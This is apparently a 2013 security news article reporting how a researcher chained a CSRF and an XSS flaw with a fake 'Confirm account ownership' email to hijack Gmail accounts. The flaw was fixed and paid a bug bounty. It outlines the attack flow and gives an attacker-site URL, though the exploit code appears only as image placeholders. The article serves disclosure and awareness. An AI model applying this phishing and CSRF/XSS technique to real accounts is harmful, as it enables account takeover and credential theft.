Hacking Google Gmail accounts exploiting password reset system flaw

0
70

9:30 ET, 25 November 2013

Security researcher Oren Hafif demonstrated how to hack a Google Gmail account exploiting a serious flaw in the password reset process.

A serious vulnerability in the password reset process of Google account allows an attacker to hijack any account, this is the sensational discovery made by security researchers Oren Hafif.

“that password recovery is often in the center of attention for attackers – and for security professionals.” reported Oren.

Oren demonstrated the feasibility of a common spear-phishing attack relying on a number of flaws including Cross-site request forgery (CSRF) and cross-site scripting (XSS). An attacker sends to the targeted account a fake “Confirm account ownership” email, claiming to come from Google.

Following the canonic scheme of attack the link embedded in the fake e-mail asks the recipient to confirm for the ownership of the account and requests victim to change the password.

The link in the email points to an HTTPS google.com URL, but exploiting a CSRF attack with a customized email address it leads the victim to a website controlled by attackers.

” The link should actually refer to an attacker’s site (and it does):

http://www.orenh.com/test.html#Email=hatechnion@gmail.com” The attacker’s site performs a CSRF with the customized email address, and once completed – launches the XSS exploit. The code might look like this:” said Oren.

g1

“the code above, reads a Hash parameter (“Email”) for the victim’s email. It creates an invisible image and puts an “initialize password recovery” link as its source.After the request is processed, an Error event is thrown (since this is not really an image).”

The Google HTTPS page will ask the victim to confirm the ownership by entering his last password and then will ask to reset his password.

 g2g3 g4

At this point the hacker has grabbed victim new password and cookie information with an XSS attack.

“The onError handler now redirects to the XSS’d URL, The user clicks “Reset Password”… and from here the sky is the limit.”

g5

The researcher published a proof of concept video to demonstrate the attack:

http://www.youtube.com/watch?feature=player_embedded&v=zJFuSPywWM8

Hafif reported the flaw to the Google Security department and Google has promptly fixed the issues assigning a reward of $5,100 under their Bug Bounty Program.

Pierluigi Paganini    

(Security Affairs – Google mail, hacking)
rsa-logo